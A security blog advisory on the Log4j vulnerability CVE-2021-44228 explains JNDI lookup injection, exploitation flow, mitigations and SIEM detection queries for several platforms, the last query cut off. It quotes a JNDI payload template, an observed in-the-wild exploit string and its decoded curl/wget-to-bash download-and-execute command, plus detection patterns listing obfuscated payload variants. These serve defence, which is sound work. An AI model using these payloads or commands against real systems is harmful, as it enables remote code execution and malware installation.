SIEM

Apache Log4j Vulnerability – Detection and Mitigation

December 13, 2021

Log4j, a prominent Java-based logging package, was found to have a vulnerability. An attacker can use this flaw to execute code on a remote server. Because Java and Log4j are so widely used, this is possibly one of the most significant Internet vulnerabilities since Heartbleed and ShellShock.

It may be possible for an attacker to gain the entire control of a vulnerable server. It can be used by an unauthenticated remote attacker to target applications that use the Log4j library in default setups.

Details:

CVE: CVE-2021-44228

CVSS: 10.0

Affected version: Log4j 2.0-beta9 up to 2.14.1

Is it Exploitable: Yes

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0, this behavior has been disabled by default.

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally.

What is Log4j?

Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers and spring-Boot web applications.Log4j is used as a logging package in a variety of different popular software by several manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft.

Also Read : Proxyshell Vulnerability – Large Exploitation of Microsoft Exchange Servers

Vulnerability details:

It’s required to know a little about JNDI (Java Naming and Directory Interface) to understand how that modification causes an issue.
Since the late 1990s, JNDI has been a part of Java. It’s a directory service that lets a Java program search a directory for data (in the form of a Java object). JNDI supports several service provider interfaces (SPIs) that allow it to work with several different directory services.
JNDI and LDAP can be used together by a Java program to locate a Java object that has data it requires. In the standard Java documentation, it uses an LDAP server to obtain characteristics from an object. It finds the JNDITutorial object from an LDAP server operating on the same computer (localhost) on port 389 and reads attributes from it using the URL ldap:/localhost:389/o=JNDITutorial.
But in the case of Log4j, an attacker can control the LDAP URL by causing Log4j to try to write a string like ${jndi:ldap:/example.com/a}. If this occurs, Log4j will connect to the example.com LDAP server and retrieve the object.
This occurs because Log4j has a specific syntax in the form $prefix:name, where prefix is one of several possible Lookups that should be evaluated when the name is evaluated. The current running version of Java, for example, is $java:version.
“The JndiLookup allows variables to be obtained using JNDI,” according to LOG4J2-313, who also included a jndi Lookup. The key is prefixed by default with java:comp/env/, however if the key contains a “:,” no prefix is added.”
With a : present in the key, as in ${jndi:ldap:/example.com/a} there’s no prefix and the LDAP server is queried for the object. And these Lookups can be utilized in both the Log4j configuration and the logging of lines.
So all an attacker has to do is find some input that gets logged and add something like ${jndi:ldap:/example.com/a}. This could be a standard HTTP header, such as User-Agent (which is frequently logged), or a form parameter, such as username, which is also logged.
This is probably quite prevalent in Log4j-based Java-based Internet-facing software. Even more devious is the fact that Java-based non-Internet software can be exploited when data is moved from system to system.
The exploit might be logged by passing a User-Agent string containing the exploit to a Java backend system that does indexing or data science.
As a consequence, it is critical that all Java-based software that uses Log4j version 2 be patched or mitigated as soon as possible. Even if the Internet-facing software is not built in Java, strings may be transmitted to Java-based systems, allowing the exploit to take place.

Also Read: Cyber Threat Intelligence Tools For Security Professionals – 2021

Impact:

This Log4j (CVE-2021-44228) vulnerability is extremely critical. Anybody using Apache frameworks services or any SpringBoot Java-based framework applications that uses log4j2 is likely to be vulnerable. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.

Exploitation Details:

The exploit works when a service or application is running with a vulnerable version of log4j2. Attackers who can control log messages or log message parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled.

1-Requirements:
- A server with a vulnerable log4j version. An endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string. log statement that logs out the string from that request.

2-How exploitation occurs:
- Data from the User gets sent to the server (via any protocol)
- The server logs the data in the request, containing the malicious payload
- The log4j vulnerability is triggered by this payload and the server requests attacker.com via (JNDI)
- This response contains a path to a remote Java class file which is injected into the server process
- This injected payload triggers a second stage and allows an attacker to execute arbitrary code.

Also Read: Most Common Windows Event IDs to Hunt – Mind Map

3-Exploitation activity:
- The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation and can be triggered using an LDAP request like the example below. ” ${jndi:ldap://attacker_controled_website/payload_to_be_executed} “
- Below is an example of one of the exploitation attempts we have observed in the wild. ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}
- The Base64-encoded data in the previous example is responsible for the delivery and execution of additional malicious payloads, an example of which is shown below. ” (curl -s 45.155.205[.]233[:]5874/[victim IP]:[victim port]||wget -q -O- 45.155.205[.]233[:]5874/[victim IP]:[victim port])|bash “
- In some cases, in successful exploitation, victims are being infected with cryptocurrency mining malware.

The action was taken by Apache:

The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Also Read: Dynamic Malware Analysis – Procmon to Extract Indicators of Compromise

Mitigation:

Run a search/grep command on all servers to spot any file with the name “log4j2”, then check if it is a vulnerable version or not.
Version 2.15.0 of log4j has been released without the vulnerability. log4j-core.jar is available on Apache Log4j page below, You can download it and update it on your system. This might be the permanent mitigation.
Add “log4j.format.msg.nolookups=true” to the global configuration of your server/web applications for temporary mitigation.
Remove the JndiLookup and JndiManager classes from the log4j-core jar. Removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.

Detection Rules:

Qradar

SELECT UTF8(payload) from events where (“cs-User-Agent” ilike ‘%${jndi:ldap:/%’ or “cs-User-Agent” ilike ‘%${jndi:rmi:/%’ or “cs-User-Agent” ilike ‘%${jndi:ldaps:/%’ or “cs-User-Agent” ilike ‘%${jndi:dns:/%’ or “cs-User-Agent” ilike ‘%/$%%7bjndi:%’ or “cs-User-Agent” ilike ‘%%%24%%7bjndi:%’ or “cs-User-Agent” ilike ‘%$%%7Bjndi:%’ or “cs-User-Agent” ilike ‘%%%2524%%257Bjndi%’ or “cs-User-Agent” ilike ‘%%%2F%%252524%%25257Bjndi%%3A%’ or “cs-User-Agent” ilike ‘%${jndi:${lower:%’ or “cs-User-Agent” ilike ‘%${::-j}${%’ or “cs-User-Agent” ilike ‘%${jndi:nis%’ or “cs-User-Agent” ilike ‘%${jndi:nds%’ or “cs-User-Agent” ilike ‘%${jndi:corba%’ or “cs-User-Agent” ilike ‘%${jndi:iiop%’ or “cs-User-Agent” ilike ‘%${${env:BARFOO:-j}%’ or “cs-User-Agent” ilike ‘%${::-l}${::-d}${::-a}${::-p}%’ or “cs-User-Agent” ilike ‘%${base64:JHtqbmRp%’) and (“user-agent” ilike ‘%${jndi:ldap:/%’ or “user-agent” ilike ‘%${jndi:rmi:/%’ or “user-agent” ilike ‘%${jndi:ldaps:/%’ or “user-agent” ilike ‘%${jndi:dns:/%’ or “user-agent” ilike ‘%/$%%7bjndi:%’ or “user-agent” ilike ‘%%%24%%7bjndi:%’ or “user-agent” ilike ‘%$%%7Bjndi:%’ or “user-agent” ilike ‘%%%2524%%257Bjndi%’ or “user-agent” ilike ‘%%%2F%%252524%%25257Bjndi%%3A%’ or “user-agent” ilike ‘%${jndi:${lower:%’ or “user-agent” ilike ‘%${::-j}${%’ or “user-agent” ilike ‘%${jndi:nis%’ or “user-agent” ilike ‘%${jndi:nds%’ or “user-agent” ilike ‘%${jndi:corba%’ or “user-agent” ilike ‘%${jndi:iiop%’ or “user-agent” ilike ‘%${${env:BARFOO:-j}%’ or “user-agent” ilike ‘%${::-l}${::-d}${::-a}${::-p}%’ or “user-agent” ilike ‘%${base64:JHtqbmRp%’) and (“cs-uri” ilike ‘%${jndi:ldap:/%’ or “cs-uri” ilike ‘%${jndi:rmi:/%’ or “cs-uri” ilike ‘%${jndi:ldaps:/%’ or “cs-uri” ilike ‘%${jndi:dns:/%’ or “cs-uri” ilike ‘%/$%%7bjndi:%’ or “cs-uri” ilike ‘%%%24%%7bjndi:%’ or “cs-uri” ilike ‘%$%%7Bjndi:%’ or “cs-uri” ilike ‘%%%2524%%257Bjndi%’ or “cs-uri” ilike ‘%%%2F%%252524%%25257Bjndi%%3A%’ or “cs-uri” ilike ‘%${jndi:${lower:%’ or “cs-uri” ilike ‘%${::-j}${%’ or “cs-uri” ilike ‘%${jndi:nis%’ or “cs-uri” ilike ‘%${jndi:nds%’ or “cs-uri” ilike ‘%${jndi:corba%’ or “cs-uri” ilike ‘%${jndi:iiop%’ or “cs-uri” ilike ‘%${${env:BARFOO:-j}%’ or “cs-uri” ilike ‘%${::-l}${::-d}${::-a}${::-p}%’ or “cs-uri” ilike ‘%${base64:JHtqbmRp%’) and (“cs-referrer” ilike ‘%${jndi:ldap:/%’ or “cs-referrer” ilike ‘%${jndi:rmi:/%’ or “cs-referrer” ilike ‘%${jndi:ldaps:/%’ or “cs-referrer” ilike ‘%${jndi:dns:/%’ or “cs-referrer” ilike ‘%/$%%7bjndi:%’ or “cs-referrer” ilike ‘%%%24%%7bjndi:%’ or “cs-referrer” ilike ‘%$%%7Bjndi:%’ or “cs-referrer” ilike ‘%%%2524%%257Bjndi%’ or “cs-referrer” ilike ‘%%%2F%%252524%%25257Bjndi%%3A%’ or “cs-referrer” ilike ‘%${jndi:${lower:%’ or “cs-referrer” ilike ‘%${::-j}${%’ or “cs-referrer” ilike ‘%${jndi:nis%’ or “cs-referrer” ilike ‘%${jndi:nds%’ or “cs-referrer” ilike ‘%${jndi:corba%’ or “cs-referrer” ilike ‘%${jndi:iiop%’ or “cs-referrer” ilike ‘%${${env:BARFOO:-j}%’ or “cs-referrer” ilike ‘%${::-l}${::-d}${::-a}${::-p}%’ or “cs-referrer” ilike ‘%${base64:JHtqbmRp%’)

Splunk 
((cs-User-Agent="*$${jndi:ldap:/*" OR cs-User-Agent="*$${jndi:rmi:/*" OR cs-User-Agent="*$${jndi:ldaps:/*" OR cs-User-Agent="*$${jndi:dns:/*" OR cs-User-Agent="*/$$%7bjndi:*" OR cs-User-Agent="*%24%7bjndi:*" OR cs-User-Agent="*$$%7Bjndi:*" OR cs-User-Agent="*%2524%257Bjndi*" OR cs-User-Agent="*%2F%252524%25257Bjndi%3A*" OR cs-User-Agent="*$${jndi:$${lower:*" OR cs-User-Agent="*$${::-j}$${*" OR cs-User-Agent="*$${jndi:nis*" OR cs-User-Agent="*$${jndi:nds*" OR cs-User-Agent="*$${jndi:corba*" OR cs-User-Agent="*$${jndi:iiop*" OR cs-User-Agent="*$${$${env:BARFOO:-j}*" OR cs-User-Agent="*$${::-l}$${::-d}$${::-a}$${::-p}*" OR cs-User-Agent="*$${base64:JHtqbmRp*") (user-agent="*$${jndi:ldap:/*" OR user-agent="*$${jndi:rmi:/*" OR user-agent="*$${jndi:ldaps:/*" OR user-agent="*$${jndi:dns:/*" OR user-agent="*/$$%7bjndi:*" OR user-agent="*%24%7bjndi:*" OR user-agent="*$$%7Bjndi:*" OR user-agent="*%2524%257Bjndi*" OR user-agent="*%2F%252524%25257Bjndi%3A*" OR user-agent="*$${jndi:$${lower:*" OR user-agent="*$${::-j}$${*" OR user-agent="*$${jndi:nis*" OR user-agent="*$${jndi:nds*" OR user-agent="*$${jndi:corba*" OR user-agent="*$${jndi:iiop*" OR user-agent="*$${$${env:BARFOO:-j}*" OR user-agent="*$${::-l}$${::-d}$${::-a}$${::-p}*" OR user-agent="*$${base64:JHtqbmRp*") (cs-uri="*$${jndi:ldap:/*" OR cs-uri="*$${jndi:rmi:/*" OR cs-uri="*$${jndi:ldaps:/*" OR cs-uri="*$${jndi:dns:/*" OR cs-uri="*/$$%7bjndi:*" OR cs-uri="*%24%7bjndi:*" OR cs-uri="*$$%7Bjndi:*" OR cs-uri="*%2524%257Bjndi*" OR cs-uri="*%2F%252524%25257Bjndi%3A*" OR cs-uri="*$${jndi:$${lower:*" OR cs-uri="*$${::-j}$${*" OR cs-uri="*$${jndi:nis*" OR cs-uri="*$${jndi:nds*" OR cs-uri="*$${jndi:corba*" OR cs-uri="*$${jndi:iiop*" OR cs-uri="*$${$${env:BARFOO:-j}*" OR cs-uri="*$${::-l}$${::-d}$${::-a}$${::-p}*" OR cs-uri="*$${base64:JHtqbmRp*") (cs-referrer="*$${jndi:ldap:/*" OR cs-referrer="*$${jndi:rmi:/*" OR cs-referrer="*$${jndi:ldaps:/*" OR cs-referrer="*$${jndi:dns:/*" OR cs-referrer="*/$$%7bjndi:*" OR cs-referrer="*%24%7bjndi:*" OR cs-referrer="*$$%7Bjndi:*" OR cs-referrer="*%2524%257Bjndi*" OR cs-referrer="*%2F%252524%25257Bjndi%3A*" OR cs-referrer="*$${jndi:$${lower:*" OR cs-referrer="*$${::-j}$${*" OR cs-referrer="*$${jndi:nis*" OR cs-referrer="*$${jndi:nds*" OR cs-referrer="*$${jndi:corba*" OR cs-referrer="*$${jndi:iiop*" OR cs-referrer="*$${$${env:BARFOO:-j}*" OR cs-referrer="*$${::-l}$${::-d}$${::-a}$${::-p}*" OR cs-referrer="*$${base64:JHtqbmRp*"))

Arcsight

((deviceCustomString1 CONTAINS "*${jndi:ldap:/*" OR deviceCustomString1 CONTAINS "*${jndi:rmi:/*" OR deviceCustomString1 CONTAINS "*${jndi:ldaps:/*" OR deviceCustomString1 CONTAINS "*${jndi:dns:/*" OR deviceCustomString1 CONTAINS "*/$%7bjndi:*" OR deviceCustomString1 CONTAINS "*%24%7bjndi:*" OR deviceCustomString1 CONTAINS "*$%7Bjndi:*" OR deviceCustomString1 CONTAINS "*%2524%257Bjndi*" OR deviceCustomString1 CONTAINS "*%2F%252524%25257Bjndi%3A*" OR deviceCustomString1 CONTAINS "*${jndi:${lower:*" OR deviceCustomString1 CONTAINS "*${::-j}${*" OR deviceCustomString1 CONTAINS "*${jndi:nis*" OR deviceCustomString1 CONTAINS "*${jndi:nds*" OR deviceCustomString1 CONTAINS "*${jndi:corba*" OR deviceCustomString1 CONTAINS "*${jndi:iiop*" OR deviceCustomString1 CONTAINS "*${${env:BARFOO:-j}*" OR deviceCustomString1 CONTAINS "*${::-l}${::-d}${::-a}${::-p}*" OR deviceCustomString1 CONTAINS "*${base64:JHtqbmRp*") AND (deviceCustomString1 CONTAINS "*${jndi:ldap:/*" OR deviceCustomString1 CONTAINS "*${jndi:rmi:/*" OR deviceCustomString1 CONTAINS "*${jndi:ldaps:/*" OR deviceCustomString1 CONTAINS "*${jndi:dns:/*" OR deviceCustomString1 CONTAINS "*/$%7bjndi:*" OR deviceCustomString1 CONTAINS "*%24%7bjndi:*" OR deviceCustomString1 CONTAINS "*$%7Bjndi:*" OR deviceCustomString1 CONTAINS "*%2524%257Bjndi*" OR deviceCustomString1 CONTAINS "*%2F%252524%25257Bjndi%3A*" OR deviceCustomString1 CONTAINS "*${jndi:${lower:*" OR deviceCustomString1 CONTAINS "*${::-j}${*" OR deviceCustomString1 CONTAINS "*${jndi:nis*" OR deviceCustomString1 CONTAINS "*${jndi:nds*" OR deviceCustomString1 CONTAINS "*${jndi:corba*" OR deviceCustomString1 CONTAINS "*${jndi:iiop*" OR deviceCustomString1 CONTAINS "*${${env:BARFOO:-j}*" OR deviceCustomString1 CONTAINS "*${::-l}${::-d}${::-a}${::-p}*" OR deviceCustomString1 CONTAINS "*${base64:JHtqbmRp*") AND (deviceCustomString1 CONTAINS "*${jndi:ldap:/*" OR deviceCustomString1 CONTAINS "*${jndi:rmi:/*" OR deviceCustomString1 CONTAINS "*${jndi:ldaps:/*" OR deviceCustomString1 CONTAINS "*${jndi:dns:/*" OR deviceCustomString1 CONTAINS "*/$%7bjndi:*" OR deviceCustomString1 CONTAINS "*%24%7bjndi:*" OR deviceCustomString1 CONTAINS "*$%7Bjndi:*" OR deviceCustomString1 CONTAINS "*%2524%257Bjndi*" OR deviceCustomString1 CONTAINS "*%2F%252524%25257Bjndi%3A*" OR deviceCustomString1 CONTAINS "*${jndi:${lower:*" OR deviceCustomString1 CONTAINS "*${::-j}${*" OR deviceCustomString1 CONTAINS "*${jndi:nis*" OR deviceCustomString1 CONTAINS "*${jndi:nds*" OR deviceCustomString1 CONTAINS "*${jndi:corba*" OR deviceCustomString1 CONTAINS "*${jndi:iiop*" OR deviceCustomString1 CONTAINS "*${${env:BARFOO:-j}*" OR deviceCustomString1 CONTAINS "*${::-l}${::-d}${::-a}${::-p}*" OR deviceCustomString1 CONTAINS "*${base64:JHtqbmRp*") AND (deviceCustomString1 CONTAINS "*${jndi:ldap:/*" OR deviceCustomString1 CONTAINS "*${jndi:rmi:/*" OR deviceCustomString1 CONTAINS "*${jndi:ldaps:/*" OR deviceCustomString1 CONTAINS "*${jndi:dns:/*" OR deviceCustomString1 CONTAINS "*/$%7bjndi:*" OR deviceCustomString1 CONTAINS "*%24%7bjndi:*" OR deviceCustomString1 CONTAINS "*$%7Bjndi:*" OR deviceCustomString1 CONTAINS "*%2524%257Bjndi*" OR deviceCustomString1 CONTAINS "*%2F%252524%25257Bjndi%3A*" OR deviceCustomString1 CONTAINS "*${jndi:${lower:*" OR deviceCustomString1 CONTAINS "*${::-j}${*" OR deviceCustomString1 CONTAINS "*${jndi:nis*" OR deviceCustomString1 CONTAINS "*${jndi:nds*" OR deviceCustomString1 CONTAINS "*${jndi:corba*" OR deviceCustomString1 CONTAINS "*${jndi:iiop*" OR deviceCustomString1 CONTAINS "*${${env:BARFOO:-j}*" OR deviceCustomString1 CONTAINS "*${::-l}${::-d}${::-a}${::-p}*" OR deviceCustomString1 CONTAINS "*${base64:JHtqbmRp*"))

Elastic search

(cs-User-Agent:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND user_agent.original:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND cs-uri:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND http.request.referrer:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*))

Apache kafka

SELECT * FROM TABLE_NAME WHERE ((cs-User-Agent ilike '%${jndi:ldap:/%' OR cs-User-Agent ilike '%${jndi:rmi:/%' OR cs-User-Agent ilike '%${jndi:ldaps:/%' OR cs-User-Agent ilike '%${jndi:dns:/%' OR cs-User-Agent ilike '%/$%7bjndi:%' OR cs-User-Agent ilike '%%24%7bjndi:%' OR cs-User-Agent ilike '%$%7Bjndi:%' OR cs-User-Agent ilike '%%2524%257Bjndi%' OR cs-User-Agent ilike '%%2F%252524%25257Bjndi%3A%' OR cs-User-Agent ilike '%${jndi:${lower:%' OR cs-User-Agent ilike '%${::-j}${%' OR cs-User-Agent ilike '%${jndi:nis%' OR cs-User-Agent ilike '%${jndi:nds%' OR cs-User-Agent ilike '%${jndi:corba%' OR cs-User-Agent ilike '%${jndi:iiop%' OR cs-User-Agent ilike '%${${env:BARFOO:-j}%' OR cs-User-Agent ilike '%${::-l}${::-d}${::-a}${::-p}%' OR cs-User-Agent ilike '%${base64:JHtqbmRp%') AND (user-agent ilike '%${jndi:ldap:/%' OR user-agent ilike '%${jndi:rmi:/%' OR user-agent ilike '%${jndi:ldaps:/%' OR user-agent ilike '%${jndi:dns:/%' OR user-agent ilike '%/$%7bjndi:%' OR user-agent ilike '%%24%7bjndi:%' OR user-agent ilike '%$%7Bjndi:%' OR user-agent ilike '%%2524%257Bjndi%' OR user-agent ilike '%%2F%252524%25257Bjndi%3A%' OR user-agent ilike '%${jndi:${lower:%' OR user-agent ilike '%${::-j}${%' OR user-agent ilike '%${jndi:nis%' OR user-agent ilike '%${jndi:nds%' OR user-agent ilike '%${jndi:corba%' OR user-agent ilike '%${jndi:iiop%' OR user-agent ilike '%${${env:BARFOO:-j}%' OR user-agent ilike '%${::-l}${::-d}${::-a}${::-p}%' OR user-agent ilike '%${base64:JHtqbmRp%') AND (cs-uri ilike '%${jndi:ldap:/%' OR cs-uri ilike '%${jndi:rmi:/%' OR cs-uri ilike '%${jndi:ldaps:/%' OR cs-uri ilike '%${jndi:dns:/%' OR cs-uri ilike '%/$%7bjndi:%' OR cs-uri ilike '%%24%7bjndi:%' OR cs-uri ilike '%$%7Bjndi:%' OR cs-uri ilike '%%2524%257Bjndi%' OR cs-uri ilike '%%2F%252524%25257Bjndi%3A%' OR cs-uri ilike '%${jndi:${lower:%' OR cs-uri ilike '%${::-j}${%' OR cs-uri ilike '%${jndi:nis%' OR cs-uri ilike '%${jndi:nds%' OR cs-uri ilike '%${jndi:corba%' OR cs-uri ilike '%${jndi:iiop%' OR cs-uri ilike '%${${env:BARFOO:-j}%' OR cs-uri ilike '%${::-l}${::-d}${::-a}${::-p}%' OR cs-uri ilike '%${base64:JHtqbmRp%') AND (cs-referrer ilike '%${jndi:ldap:/%' OR cs-referrer ilike '%${jndi:rmi:/%' OR cs-referrer ilike '%${jndi:ldaps:/%' OR cs-referrer ilike '%${jndi:dns:/%' OR cs-referrer ilike '%/$%7bjndi:%' OR cs-referrer ilike '%%24%7bjndi:%' OR cs-referrer ilike '%$%7Bjndi:%' OR cs-referrer ilike '%%2524%257Bjndi%' OR cs-referrer ilike '%%2F%252524%25257Bjndi%3A%' OR cs-referrer ilike '%${jndi:${lower:%' OR cs-referrer ilike '%${::-j}${%' OR cs-referrer ilike '%${jndi:nis%' OR cs-referrer ilike '%${jndi:nds%' OR cs-referrer ilike '%${jndi:corba%' OR cs-referrer ilike '%${jndi:iiop%' OR cs-referrer ilike '%${${env:BARFOO:-j}%' OR cs-referrer ilike '%${::-l}${::-d}${::-a}${::-p}%' OR cs-referrer ilike '%${base64:JHtqbmRp%'));


Sumo Logic 

(_sourceCategory=*webserver* AND ("${jndi:ldap:/" OR "${jndi:rmi:/" OR "${jndi:ldaps:/" OR "${jndi:dns:/" OR "/$%7bjndi:" OR "%24%7bjndi:" OR "$%7Bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "${jndi:${lower:" OR "${::-j}${" OR "${jndi:nis" OR "${jndi:nds" OR "${jndi:corba" OR "${jndi:iiop" OR "${${env:BARFOO:-j}" OR "${::-l}${::-d}${::-a}${::-p}" OR "${base64:JHtqbmRp") AND ("${jndi:ldap:/" OR "${jndi:rmi:/" OR "${jndi:ldaps:/" OR "${jndi:dns:/" OR "/$%7bjndi:" OR "%24%7bjndi:" OR "$%7Bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "${jndi:${lower:" OR "${::-j}${" OR "${jndi:nis" OR "${jndi:nds" OR "${jndi:corba" OR "${jndi:iiop" OR "${${env:BARFOO:-j}" OR "${::-l}${::-d}${::-a}${::-p}" OR "${base64:JHtqbmRp") AND ("${jndi:ldap:/" OR "${jndi:rmi:/" OR "${jndi:ldaps:/" OR "${jndi:dns:/" OR "/$%7bjndi:" OR "%24%7bjndi:" OR "$%7Bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "${jndi:${lower:" OR "${::-j}${" OR "${jndi:nis" OR "${jndi:nds" OR "${jndi:corba" OR "${jndi:iiop" OR "${${env:BARFOO:-j}" OR "${::-l}${::-d}${::-a}${::-p}" OR "${base64:JHtqbmRp") AND ("${jndi:ldap:/" OR "${jndi:rmi:/" OR "${jndi:ldaps:/" OR "${jndi:dns:/" OR "/$%7bjndi:" OR "%24%7bjndi:" OR "$%7Bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "${jndi:${lower:" OR "${::-j}${" OR "${jndi:nis" OR "${jndi:nds" OR "${jndi:corba" OR "${jndi:iiop" OR "${${env:BARFOO:-j}" OR "${::-l}${::-d}${::-a}${::-p}" OR "${base64:JHtqbmRp"))

RSA NetWitness

((cs-User-Agent contains '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/', '/\$%7bjndi:', '%24%7bjndi:', '$%7Bjndi:', '%2524%257Bjndi', '%2F%252524%25257Bjndi%3A', '${jndi:\${lower:', '${::-j}\${', '${jndi:nis', '${jndi:nds', '${jndi:corba', '${jndi:iiop', '${\${env:BARFOO:-j}', '${::-l}\${::-d}\${::-a}\${::-p}', '${base64:JHtqbmRp') && (user-agent contains '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/', '/\$%7bjndi:', '%24%7bjndi:', '$%7Bjndi:', '%2524%257Bjndi', '%2F%252524%25257Bjndi%3A', '${jndi:\${lower:', '${::-j}\${', '${jndi:nis', '${jndi:nds', '${jndi:corba', '${jndi:iiop', '${\${env:BARFOO:-j}', '${::-l}\${::-d}\${::-a}\${::-p}', '${base64:JHtqbmRp') && (cs-uri contains '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/', '/\$%7bjndi:', '%24%7bjndi:', '$%7Bjndi:', '%2524%257Bjndi', '%2F%252524%25257Bjndi%3A', '${jndi:\${lower:', '${::-j}\${', '${jndi:nis', '${jndi:nds', '${jndi:corba', '${jndi:iiop', '${\${env:BARFOO:-j}', '${::-l}\${::-d}\${::-a}\${::-p}', '${base64:JHtqbmRp') && (cs-referrer contains '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/', '/\$%7bjndi:', '%24%7bjndi:', '$%7Bjndi:', '%2524%257Bjndi', '%2F%252524%25257Bjndi%3A', '${jndi:\${lower:', '${::-j}\${', '${jndi:nis', '${jndi:nds', '${jndi:corba', '${jndi:iiop', '${\${env:BARFOO:-j}', '${::-l}\${::-d}\${::-a}\${::-p}', '${base64:JHtqbmRp'))

Zeek 

(event.dataset:"zeek.http" AND cs-User-Agent:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND user_agent.original:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND url.original:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* 